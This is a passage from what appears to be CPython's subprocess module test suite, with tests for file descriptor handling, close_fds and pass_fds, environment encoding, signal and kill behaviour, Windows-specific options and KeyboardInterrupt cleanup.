sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
finally:
# Restore original stdin and stdout
os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
try:
temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = self._save_fds(range(3))
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
self._restore_fds(saved_fds)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = support.strip_python_stderr(os.read(temp_fds[0], 1024))
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = self._save_fds(range(3))
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = support.strip_python_stderr(os.read(stderr_no, 1024))
finally:
self._restore_fds(saved_fds)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
[sys.executable, "-c", "pass"],
preexec_fn=prepare)
except ValueError as err:
# Pure Python implementations keeps the message
self.assertIsNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "surrogate:\uDCff")
except subprocess.SubprocessError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
self.fail("Expected ValueError or subprocess.SubprocessError")
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
encoded_value = value.encode("ascii", "surrogateescape")
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ASCII for the locale encoding to force
# surrogate-escaping of \xFF in the child process; otherwise it can
# be decoded as-is if the default locale is latin-1.
env['LC_ALL'] = 'C'
if sys.platform.startswith("aix"):
# On AIX, the C locale uses the Latin1 encoding
decoded_value = encoded_value.decode("latin1", "surrogateescape")
else:
# On other UNIXes, the C locale uses the ASCII encoding
decoded_value = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
# test bytes
key = key.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = encoded_value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(sys.executable)
path, program = os.path.split(sys.executable)
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program, "-c", "pass"])
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'" + abs_program + b"' -c pass"
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program, "-c", "pass"], env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program, "-c", "pass"], env=envb)
self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=fds_to_keep)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse((remaining_fds - fds_to_keep) & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
"Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
"""Confirm that issue21618 is fixed (may fail under valgrind)."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# This launches the meat of the test in a child process to
# avoid messing with the larger unittest processes maximum
# number of file descriptors.
# This process launches:
# +--> Process that lowers its RLIMIT_NOFILE aftr setting up
# a bunch of high open fds above the new lower rlimit.
# Those are reported via stdout before launching a new
# process with close_fds=False to run the actual test:
# +--> The TEST: This one launches a fd_status.py
# subprocess with close_fds=True so we can find out if
# any of the fds above the lowered rlimit are still open.
p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
'''
import os, resource, subprocess, sys, textwrap
open_fds = set()
# Add a bunch more fds to pass down.
for _ in range(40):
fd = os.open(os.devnull, os.O_RDONLY)
open_fds.add(fd)
# Leave a two pairs of low ones available for use by the
# internal child error pipe and the stdout pipe.
# We also leave 10 more open as some Python buildbots run into
# "too many open files" errors during the test if we do not.
for fd in sorted(open_fds)[:14]:
os.close(fd)
open_fds.remove(fd)
for fd in open_fds:
#self.addCleanup(os.close, fd)
os.set_inheritable(fd, True)
max_fd_open = max(open_fds)
# Communicate the open_fds to the parent unittest.TestCase process.
print(','.join(map(str, sorted(open_fds))))
sys.stdout.flush()
rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
try:
# 29 is lower than the highest fds we are leaving open.
resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
# Launch a new Python interpreter with our low fd rlim_cur that
# inherits open fds above that limit. It then uses subprocess
# with close_fds=True to get a report of open fds in the child.
# An explicit list of fds to check is passed to fd_status.py as
# letting fd_status rely on its default logic would miss the
# fds above rlim_cur as it normally only checks up to that limit.
subprocess.Popen(
[sys.executable, '-c',
textwrap.dedent("""
import subprocess, sys
subprocess.Popen([sys.executable, %r] +
[str(x) for x in range({max_fd})],
close_fds=True).wait()
""".format(max_fd=max_fd_open+1))],
close_fds=False).wait()
finally:
resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
''' % fd_status)], stdout=subprocess.PIPE)
output, unused_stderr = p.communicate()
output_lines = output.splitlines()
self.assertEqual(len(output_lines), 2,
msg="expected exactly two lines of output:\n%r" % output)
opened_fds = set(map(int, output_lines[0].strip().split(b',')))
remaining_fds = set(map(int, output_lines[1].strip().split(b',')))
self.assertFalse(remaining_fds & opened_fds,
msg="Some fds were left open.")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
os.set_inheritable(fds[0], True)
os.set_inheritable(fds[1], True)
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
[sys.executable, "-c", "import sys; sys.exit(0)"],
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = support.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
os.kill(pid, signal.SIGKILL)
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(OSError):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
# Issue #22290: fork_exec() must not crash on memory allocation failure
# or other errors
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
# Use a preexec function and enable the garbage collector
# to force fork_exec() to re-enable the garbage collector
# on error.
func = lambda: None
gc.enable()
for args, exe_list, cwd, env_list in (
(123, [b"exe"], None, [b"env"]),
([b"arg"], 123, None, [b"env"]),
([b"arg"], [b"exe"], 123, [b"env"]),
([b"arg"], [b"exe"], None, 123),
):
with self.assertRaises(TypeError):
_posixsubprocess.fork_exec(
args, exe_list,
True, (), cwd, env_list,
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, func)
finally:
if not gc_enabled:
gc.disable()
@support.cpython_only
def test_fork_exec_sorted_fd_sanity_check(self):
# Issue #23564: sanity check the fork_exec() fds_to_keep sanity check.
import _posixsubprocess
class BadInt:
first = True
def __init__(self, value):
self.value = value
def __int__(self):
if self.first:
self.first = False
return self.value
raise ValueError
gc_enabled = gc.isenabled()
try:
gc.enable()
for fds_to_keep in (
(-1, 2, 3, 4, 5), # Negative number.
('str', 4), # Not an int.
(18, 23, 42, 2**63), # Out of range.
(5, 4), # Not sorted.
(6, 7, 7, 8), # Duplicate.
(BadInt(1), BadInt(2)),
):
with self.assertRaises(
ValueError,
msg='fds_to_keep={}'.format(fds_to_keep)) as c:
_posixsubprocess.fork_exec(
[b"false"], [b"false"],
True, fds_to_keep, None, [b"env"],
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, None)
self.assertIn('fds_to_keep', str(c.exception))
finally:
if not gc_enabled:
gc.disable()
def test_communicate_BrokenPipeError_stdin_close(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen([sys.executable, '-c', 'pass'])
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
proc.communicate() # Should swallow BrokenPipeError from close.
mock_proc_stdin.close.assert_called_with()
def test_communicate_BrokenPipeError_stdin_write(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen([sys.executable, '-c', 'pass'])
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.write.side_effect = BrokenPipeError
proc.communicate(b'stuff') # Should swallow the BrokenPipeError.
mock_proc_stdin.write.assert_called_once_with(b'stuff')
mock_proc_stdin.close.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_flush(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin, \
open(os.devnull, 'wb') as dev_null:
mock_proc_stdin.flush.side_effect = BrokenPipeError
# because _communicate registers a selector using proc.stdin...
mock_proc_stdin.fileno.return_value = dev_null.fileno()
# _communicate() should swallow BrokenPipeError from flush.
proc.communicate(b'stuff')
mock_proc_stdin.flush.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_close_with_timeout(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
# _communicate() should swallow BrokenPipeError from close.
proc.communicate(timeout=999)
mock_proc_stdin.close.assert_called_once_with()
@unittest.skipUnless(_testcapi is not None
and hasattr(_testcapi, 'W_STOPCODE'),
'need _testcapi.W_STOPCODE')
def test_stopped(self):
"""Test wait() behavior when waitpid returns WIFSTOPPED; issue29335."""
args = [sys.executable, '-c', 'pass']
proc = subprocess.Popen(args)
# Wait until the real process completes to avoid zombie process
pid = proc.pid
pid, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
status = _testcapi.W_STOPCODE(3)
with mock.patch('subprocess.os.waitpid', return_value=(pid, status)):
returncode = proc.wait()
self.assertEqual(returncode, -3)
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
# We uses hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_startupinfo_keywords(self):
# startupinfo argument
# We use hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USERSHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO(
dwFlags=STARTF_USERSHOWWINDOW,
wShowWindow=SW_MAXIMIZE
)
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
@support.cpython_only
def test_issue31471(self):
# There shouldn't be an assertion failure in Popen() in case the env
# argument has a bad keys() method.
class BadEnv(dict):
keys = None
with self.assertRaises(TypeError):
subprocess.Popen([sys.executable, "-c", "pass"], env=BadEnv())
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_close_fds_with_stdio(self):
import msvcrt
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
handles = []
for fd in fds:
os.set_inheritable(fd, True)
handles.append(msvcrt.get_osfhandle(fd))
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
int(stdout.strip()) # Check that stdout is an integer
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# The same as the previous call, but with an empty handle_list
handle_list = []
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handle_list}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# Check for a warning due to using handle_list and close_fds=False
with support.check_warnings((".*overriding close_fds", RuntimeWarning)):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handles[:]}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
def test_empty_attribute_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {}
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_empty_handle_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": []}
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_encodings(self):
# Run command through the shell (string)
for enc in ['ansi', 'oem']:
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv,
encoding=enc)
with p:
self.assertIn("physalis", p.stdout.read(), enc)
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
# Some win32 buildbot raises EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class MiscTests(unittest.TestCase):
class RecordingPopen(subprocess.Popen):
"""A Popen that saves a reference to each instance for testing."""
instances_created = []
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.instances_created.append(self)
@mock.patch.object(subprocess.Popen, "_communicate")
def _test_keyboardinterrupt_no_kill(self, popener, mock__communicate,
**kwargs):
"""Fake a SIGINT happening during Popen._communicate() and ._wait().
This avoids the need to actually try and get test environments to send
and receive signals reliably across platforms. The net effect of a ^C
happening during a blocking subprocess execution which we want to clean
up from is a KeyboardInterrupt coming out of communicate() or wait().
"""
mock__communicate.side_effect = KeyboardInterrupt
try:
with mock.patch.object(subprocess.Popen, "_wait") as mock__wait:
# We patch out _wait() as no signal was involved so the
# child process isn't actually going to exit rapidly.
mock__wait.side_effect = KeyboardInterrupt
with mock.patch.object(subprocess, "Popen",
self.RecordingPopen):
with self.assertRaises(KeyboardInterrupt):
popener([sys.executable, "-c",
"import time\ntime.sleep(9)\nimport sys\n"
"sys.stderr.write('\\n!runaway child!\\n')"],
stdout=subprocess.DEVNULL, **kwargs)
for call in mock__wait.call_args_list[1:]:
self.assertNotEqual(
call, mock.call(timeout=None),
"no open-ended wait() after the first allowed: "
f"{mock__wait.call_args_list}")
sigint_calls = []
for call in mock__wait.call_args_list:
if call == mock.call(timeout=0.25): # from Popen.__init__
sigint_calls.append(call)
self.assertLessEqual(mock__wait.call_count, 2,
msg=mock__wait.call_args_list)
self.assertEqual(len(sigint_calls), 1,
msg=mock__wait.call_args_list)
finally:
# cleanup the forgotten (due to our mocks) child process
process = self.RecordingPopen.instances_created.pop()
process.kill()
process.wait()
self.assertEqual([], self.RecordingPopen.instances_created)
def test_call_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.call, timeout=6.282)
def test_run_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.run, timeout=6.282)
def test_context_manager_keyboardinterrupt_no_kill(self):
def popen_via_context_manager(*args, **kwargs):
with subprocess.Popen(*args, **kwargs) as unused_process:
raise KeyboardInterrupt # Test how __exit__ handles ^C.
self._test_keyboardinterrupt_no_kill(popen_via_context_manager)
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
def test__all__(self):
"""Ensure that __all__ is populated properly."""
intentionally_excluded = {"list2cmdline", "Handle"}
exported = set(subprocess.__all__)
possible_exports = set()
import types
for name, value in subprocess.__dict__.items():
if name.startswith('_'):
continue
